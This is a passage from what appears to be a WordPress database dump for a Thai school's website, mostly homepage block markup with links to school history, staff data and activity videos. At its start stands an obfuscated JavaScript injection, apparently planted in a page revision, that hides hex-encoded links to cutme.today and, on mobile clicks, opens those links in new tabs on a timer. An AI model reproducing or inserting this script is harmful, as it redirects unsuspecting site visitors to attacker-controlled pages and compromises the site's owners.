_0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-08-28 09:17:49','2024-08-28 02:17:49','',19,'http://watprato.ssk.in.th/?p=232',0,'revision','',0),
(233,2,'2024-08-28 09:21:41','2024-08-28 02:21:41','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":3,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_152c5d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_152c5d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1X6Ept6IxYaNET5DErIMExwq1jHu3vOIS/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">แบบวัดการรับรู้ EIT 2</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"abc6c06d\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a 